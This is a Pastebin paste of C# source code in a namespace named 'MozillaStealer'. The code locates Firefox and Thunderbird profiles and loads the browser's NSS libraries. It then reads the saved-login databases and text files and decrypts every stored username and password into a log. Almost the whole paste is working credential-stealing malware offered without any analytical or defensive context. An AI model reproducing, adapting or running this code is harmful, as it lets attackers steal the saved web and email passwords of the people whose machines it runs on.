API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 26th, 2017
92
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 19.22 KB | None | 0 0
raw download clone embed print report
  1. using System;
  2. using System.IO;
  3. using System.Runtime.InteropServices;
  4. using System.Data;
  5. using System.Text;
  6. using System.Threading;
  7. using System.Reflection;
  8. using System.ComponentModel;
  9. using System.Collections;
  10.  
  11. namespace MozillaStealer {
  12.  
  13. static class Stealer {
  14.  
  15. [StructLayout(LayoutKind.Sequential)]
  16. private struct TSECItem {
  17. public int SECItemType;
  18. public int SECItemData;
  19. public int SECItemLen;
  20. }
  21.  
  22. private static IntPtr NSS3;
  23.  
  24. static string RealProgramFiles()
  25. {
  26. if (8 == IntPtr.Size || (!String.IsNullOrEmpty(Environment.GetEnvironmentVariable("PROCESSOR_ARCHITEW6432"))))
  27. {
  28. return Environment.GetEnvironmentVariable("ProgramFiles(x86)");
  29. }
  30. return Environment.GetEnvironmentVariable("ProgramFiles");
  31. }
  32.  
  33. [DllImport("kernel32.dll")]
  34. static extern IntPtr LoadLibraryEx(string lpFileName, IntPtr hFile, uint dwFlags);
  35.  
  36. [DllImport("kernel32.dll")]
  37. static extern IntPtr LoadLibrary(string lpFileName);
  38.  
  39. [DllImport("kernel32.dll")]
  40. static extern IntPtr FreeLibrary(string lpFileName);
  41.  
  42. [DllImport("kernel32.dll")]
  43. public extern static IntPtr GetProcAddress(int hwnd, string procedureName);
  44.  
  45. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  46. private delegate long DLLFunctionDelegate(string configdir);
  47.  
  48. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  49. private delegate long DLLFunctionDelegate2();
  50.  
  51. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  52. private delegate long DLLFunctionDelegate3(long slot, bool loadCerts, long wincx);
  53.  
  54. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  55. private delegate int DLLFunctionDelegate4(IntPtr arenaOpt, IntPtr outItemOpt, StringBuilder inStr, int inLen);
  56.  
  57. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  58. private delegate int DLLFunctionDelegate5(ref TSECItem data, ref TSECItem result, int cx);
  59.  
  60. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  61. private delegate int DLLFunctionDelegate6(long slot);
  62.  
  63. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  64. private delegate int DLLFunctionDelegate7(ref TSECItem item, bool freeItem);
  65.  
  66.  
  67.  
  68. private static long PK11_GetInternalKeySlot()
  69. {
  70. IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "PK11_GetInternalKeySlot");
  71. DLLFunctionDelegate2 dll = (DLLFunctionDelegate2)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate2));
  72. return dll();
  73. }
  74.  
  75. private static long NSS_Init(string configdir, string program)
  76. {
  77. try
  78. {
  79. string MozillaPath = RealProgramFiles() + program;
  80. DLLFunctionDelegate dll = null;
  81. LoadLibrary(MozillaPath + "mozcrt19.dll");
  82. LoadLibrary(MozillaPath + "nspr4.dll");
  83. LoadLibrary(MozillaPath + "plc4.dll");
  84. LoadLibrary(MozillaPath + "plds4.dll");
  85. LoadLibrary(MozillaPath + "ssutil3.dll");
  86. LoadLibrary(MozillaPath + "sqlite3.dll");
  87. LoadLibrary(MozillaPath + "nssutil3.dll");
  88. LoadLibrary(MozillaPath + "softokn3.dll");
  89.  
  90. NSS3 = LoadLibrary(MozillaPath + "nss3.dll");
  91. IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "NSS_Init");
  92. dll = (DLLFunctionDelegate)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate));
  93. return dll(configdir);
  94. }
  95. catch
  96. {
  97. return 0;
  98. }
  99. }
  100.  
  101. private static long NSS_Cleanup(string configdir, string program)
  102. {
  103. try
  104. {
  105. string MozillaPath = RealProgramFiles() + program;
  106.  
  107. IntPtr pProc1 = GetProcAddress(NSS3.ToInt32(), "NSS_Shutdown");
  108. DLLFunctionDelegate dll1 = (DLLFunctionDelegate)Marshal.GetDelegateForFunctionPointer(pProc1, typeof(DLLFunctionDelegate));
  109. dll1("test");
  110.  
  111. FreeLibrary(MozillaPath + "mozcrt19.dll");
  112. FreeLibrary(MozillaPath + "nspr4.dll");
  113. FreeLibrary(MozillaPath + "plc4.dll");
  114. FreeLibrary(MozillaPath + "plds4.dll");
  115. FreeLibrary(MozillaPath + "ssutil3.dll");
  116. FreeLibrary(MozillaPath + "sqlite3.dll");
  117. FreeLibrary(MozillaPath + "nssutil3.dll");
  118. FreeLibrary(MozillaPath + "softokn3.dll");
  119. FreeLibrary(MozillaPath + "nss3.dll");
  120. NSS3 = IntPtr.Zero;
  121.  
  122. return 1;
  123. }
  124. catch
  125. {
  126. return 0;
  127. }
  128. }
  129.  
  130. private static long PK11_Authenticate(long slot, bool loadCerts, long wincx)
  131. {
  132. IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "PK11_Authenticate");
  133. DLLFunctionDelegate3 dll = (DLLFunctionDelegate3)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate3));
  134. return dll(slot, loadCerts, wincx);
  135. }
  136.  
  137. private static int PK11_FreeSlot(long slot)
  138. {
  139. IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "PK11_FreeSlot");
  140. DLLFunctionDelegate6 dll = (DLLFunctionDelegate6)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate6));
  141. return dll(slot);
  142. }
  143.  
  144. private static int SECItem_FreeItem(ref TSECItem item, bool freeItem)
  145. {
  146. IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "SECItem_FreeItem");
  147. DLLFunctionDelegate7 dll = (DLLFunctionDelegate7)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate7));
  148. return dll(ref item, freeItem);
  149. }
  150.  
  151. private static int NSSBase64_DecodeBuffer(IntPtr arenaOpt, IntPtr outItemOpt, StringBuilder inStr, int inLen) {
  152. IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "NSSBase64_DecodeBuffer");
  153. DLLFunctionDelegate4 dll = (DLLFunctionDelegate4)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate4));
  154. return dll(arenaOpt, outItemOpt, inStr, inLen);
  155. }
  156.  
  157. private static int PK11SDR_Decrypt(ref TSECItem data, ref TSECItem result, int cx) {
  158. IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "PK11SDR_Decrypt");
  159. DLLFunctionDelegate5 dll = (DLLFunctionDelegate5)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate5));
  160. return dll(ref data, ref result, cx);
  161. }
  162.  
  163. private static string Decrypt(string value) {
  164. new TSECItem();
  165. TSECItem tSecDec = new TSECItem();
  166. byte[] bvRet;
  167.  
  168. StringBuilder se = new StringBuilder(value);
  169. int tValue = NSSBase64_DecodeBuffer(IntPtr.Zero, IntPtr.Zero, se, se.Length);
  170. if(tValue != 0) {
  171. TSECItem item = (TSECItem)Marshal.PtrToStructure(new IntPtr(tValue), typeof(TSECItem));
  172. if(PK11SDR_Decrypt(ref item, ref tSecDec, 0) == 0) {
  173. if(tSecDec.SECItemLen != 0) {
  174. bvRet = new byte[tSecDec.SECItemLen];
  175. Marshal.Copy(new IntPtr(tSecDec.SECItemData), bvRet, 0, tSecDec.SECItemLen);
  176. return Encoding.ASCII.GetString(bvRet);
  177. }
  178. }
  179. SECItem_FreeItem(ref item, true);
  180. }
  181. return string.Empty;
  182. }
  183.  
  184.  
  185.  
  186. private static string GetSQLEntrys(string signon)
  187. {
  188. string Log = string.Empty;
  189.  
  190. SQLiteBase db = new SQLiteBase(signon);
  191.  
  192. DataTable hostTable = db.ExecuteQuery("SELECT hostname FROM moz_disabledHosts;");
  193. DataTable logins = db.ExecuteQuery("SELECT hostname,encryptedUsername,encryptedPassword FROM moz_logins;");
  194.  
  195. foreach (DataRow row in hostTable.Rows)
  196. {
  197. Log += "No_Saved: " + row.ToString() + "\n";
  198. }
  199.  
  200. try
  201. {
  202. long KeySlot = PK11_GetInternalKeySlot();
  203. PK11_Authenticate(KeySlot, true, 0);
  204. }
  205. catch { }
  206.  
  207. foreach (DataRow row in logins.Rows)
  208. {
  209. Log += "URL: " + row[0].ToString() + " | ";
  210. Log += "User: " + Decrypt(row[1].ToString()) + " | ";
  211. Log += "Password: " + Decrypt(row[2].ToString()) + " |\n";
  212.  
  213. Thread.Sleep(500);
  214. }
  215. return Log;
  216. }
  217.  
  218. private static ArrayList GetSQLEntrys(string signon, bool Parsed)
  219. {
  220. string[] Log = new string[3];
  221. ArrayList returnArray = new ArrayList();
  222.  
  223. SQLiteBase db = new SQLiteBase(signon);
  224. DataTable logins = db.ExecuteQuery("SELECT hostname,encryptedUsername,encryptedPassword FROM moz_logins;");
  225.  
  226. long KeySlot = 0;
  227. try
  228. {
  229. KeySlot = PK11_GetInternalKeySlot();
  230. PK11_Authenticate(KeySlot, true, 0);
  231. }
  232. catch { }
  233.  
  234. foreach (DataRow row in logins.Rows)
  235. {
  236. Log[0] = row[0].ToString();
  237. Log[1] = Decrypt(row[1].ToString());
  238. Log[2] = Decrypt(row[2].ToString());
  239. returnArray.Add(Log);
  240. Log = new string[3];
  241. Thread.Sleep(50);
  242. }
  243.  
  244. try
  245. {
  246. PK11_FreeSlot(KeySlot);
  247. }
  248. catch { }
  249.  
  250. return returnArray;
  251. }
  252.  
  253. private static string GetTXTEntrys(string path)
  254. {
  255. string Log = string.Empty;
  256. StreamReader signonFile = new StreamReader(path);
  257. signonFile.ReadLine();
  258. string line = string.Empty;
  259.  
  260. long KeySlot = PK11_GetInternalKeySlot();
  261. PK11_Authenticate(KeySlot, true, 0);
  262.  
  263. while ((line = signonFile.ReadLine()) != ".")
  264. {
  265. Log += "No_Save: " + line + "\n";
  266. }
  267.  
  268. line = signonFile.ReadLine();
  269. while (line != null && line != string.Empty)
  270. {
  271. Log += "Url: " + line + " | ";
  272.  
  273. line = signonFile.ReadLine();
  274. while (line != null && line != ".")
  275. {
  276. line = signonFile.ReadLine();
  277. Log += "User: " + Decrypt(line) + " | ";
  278. signonFile.ReadLine();
  279. line = signonFile.ReadLine();
  280. if (line.StartsWith("~"))
  281. {
  282. line = line.Substring(1);
  283. }
  284. Log += "Password: " + Decrypt(line) + "\n";
  285. if (path.Contains("signons2.txt"))
  286. {
  287. signonFile.ReadLine();
  288. }
  289. if (path.Contains("signons3.txt"))
  290. {
  291. signonFile.ReadLine();
  292. signonFile.ReadLine();
  293. }
  294. }
  295. line = signonFile.ReadLine();
  296. }
  297. return Log;
  298. }
  299.  
  300. private static ArrayList GetTXTEntrys(string path, bool Parsed)
  301. {
  302. ArrayList returnArray = new ArrayList();
  303.  
  304. StreamReader signonFile = new StreamReader(path);
  305. signonFile.ReadLine();
  306. string line = string.Empty;
  307.  
  308. long KeySlot = PK11_GetInternalKeySlot();
  309. PK11_Authenticate(KeySlot, true, 0);
  310.  
  311. line = signonFile.ReadLine();
  312.  
  313. string[] Log = new string[3];
  314. while (line != null && line != string.Empty)
  315. {
  316. Log[0] = "Url: " + line + " | ";
  317.  
  318. line = signonFile.ReadLine();
  319. while (line != null && line != ".")
  320. {
  321. line = signonFile.ReadLine();
  322. Log[1] = "User: " + Decrypt(line) + " | ";
  323. signonFile.ReadLine();
  324. line = signonFile.ReadLine();
  325. if (line.StartsWith("~"))
  326. {
  327. line = line.Substring(1);
  328. }
  329. Log[2] = "Password: " + Decrypt(line) + "\n";
  330. returnArray.Add(Log);
  331. Log = new string[3];
  332. if (path.Contains("signons2.txt"))
  333. {
  334. signonFile.ReadLine();
  335. }
  336. if (path.Contains("signons3.txt"))
  337. {
  338. signonFile.ReadLine();
  339. signonFile.ReadLine();
  340. }
  341. }
  342. line = signonFile.ReadLine();
  343. }
  344. return returnArray;
  345. }
  346.  
  347.  
  348.  
  349.  
  350. public static ArrayList GetMozillaThunderbirdPass()
  351. {
  352. ArrayList log = new ArrayList();
  353. string thunderbirdPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Thunderbird\Profiles";
  354. try
  355. {
  356. string[] dirs = Directory.GetDirectories(thunderbirdPath);
  357. foreach (string dir in dirs)
  358. {
  359. string[] files = Directory.GetFiles(dir);
  360. foreach (string file in files)
  361. {
  362. if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons.sqlite"))
  363. {
  364. NSS_Init(dir, @"\Mozilla Thunderbird\");
  365. log = GetSQLEntrys(dir + @"\signons.sqlite", true);
  366. NSS_Cleanup(dir, @"\Mozilla Thunderbird\");
  367. break;
  368. }
  369. }
  370. }
  371. }
  372. catch { };
  373.  
  374. return log;
  375. }
  376. public static ArrayList GetMozillaFirefoxPass()
  377. {
  378. ArrayList log = new ArrayList();
  379. string firefoxPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Mozilla\Firefox\Profiles";
  380.  
  381. try
  382. {
  383. string[] dirs = Directory.GetDirectories(firefoxPath);
  384. foreach (string dir in dirs)
  385. {
  386. string[] files = Directory.GetFiles(dir);
  387. foreach (string file in files)
  388. {
  389. if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons.sqlite"))
  390. {
  391. NSS_Init(dir, @"\Mozilla Firefox\");
  392. log = GetSQLEntrys(dir + @"\signons.sqlite", true);
  393. NSS_Cleanup(dir, @"\Mozilla Firefox\");
  394. break;
  395. }
  396. else if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons.txt"))
  397. {
  398. NSS_Init(dir, @"\Mozilla Firefox\");
  399. log = GetTXTEntrys(dir + @"\signons.txt", true);
  400. NSS_Cleanup(dir, @"\Mozilla Firefox\");
  401. break;
  402. }
  403. else if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons2.txt"))
  404. {
  405. NSS_Init(dir, @"\Mozilla Firefox\");
  406. log = GetTXTEntrys(dir + @"\signons2.txt", true);
  407. NSS_Cleanup(dir, @"\Mozilla Firefox\");
  408. break;
  409. }
  410. else if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons3.txt"))
  411. {
  412. NSS_Init(dir, @"\Mozilla Firefox\");
  413. log = GetTXTEntrys(dir + @"\signons3.txt", true);
  414. NSS_Cleanup(dir, @"\Mozilla Firefox\");
  415. break;
  416. }
  417. }
  418. }
  419. }
  420. catch (Exception x) { Console.WriteLine(x.Message); };
  421. return log;
  422. }
  423.  
  424. public static string GetMozillaPass()
  425. {
  426. string log = string.Empty;
  427. string firefoxPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Mozilla\Firefox\Profiles";
  428. string thunderbirdPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Thunderbird\Profiles";
  429.  
  430. try
  431. {
  432. string[] dirs = Directory.GetDirectories(thunderbirdPath);
  433. foreach (string dir in dirs)
  434. {
  435. string[] files = Directory.GetFiles(dir);
  436. foreach (string file in files)
  437. {
  438. if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons.sqlite"))
  439. {
  440. NSS_Init(dir, @"\Mozilla Thunderbird\");
  441. log += GetSQLEntrys(dir + @"\signons.sqlite");
  442. break;
  443. }
  444. }
  445. }
  446. }
  447. catch { };
  448.  
  449. try
  450. {
  451. string[] dirs = Directory.GetDirectories(firefoxPath);
  452. foreach (string dir in dirs)
  453. {
  454. string[] files = Directory.GetFiles(dir);
  455. foreach (string file in files)
  456. {
  457. if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons.sqlite"))
  458. {
  459. NSS_Init(dir, @"\Mozilla Firefox\");
  460. log += GetSQLEntrys(dir + @"\signons.sqlite");
  461. break;
  462. }
  463. else if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons.txt"))
  464. {
  465. NSS_Init(dir, @"\Mozilla Firefox\");
  466. log += GetTXTEntrys(dir + @"\signons.txt");
  467. break;
  468. }
  469. else if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons2.txt"))
  470. {
  471. NSS_Init(dir, @"\Mozilla Firefox\");
  472. log += GetTXTEntrys(dir + @"\signons2.txt");
  473. break;
  474. }
  475. else if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons3.txt"))
  476. {
  477. NSS_Init(dir, @"\Mozilla Firefox\");
  478. log += GetTXTEntrys(dir + @"\signons3.txt");
  479. break;
  480. }
  481. }
  482. }
  483. }
  484. catch (Exception x) { Console.WriteLine(x.Message); };
  485. return log;
  486. }
  487. }
  488. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!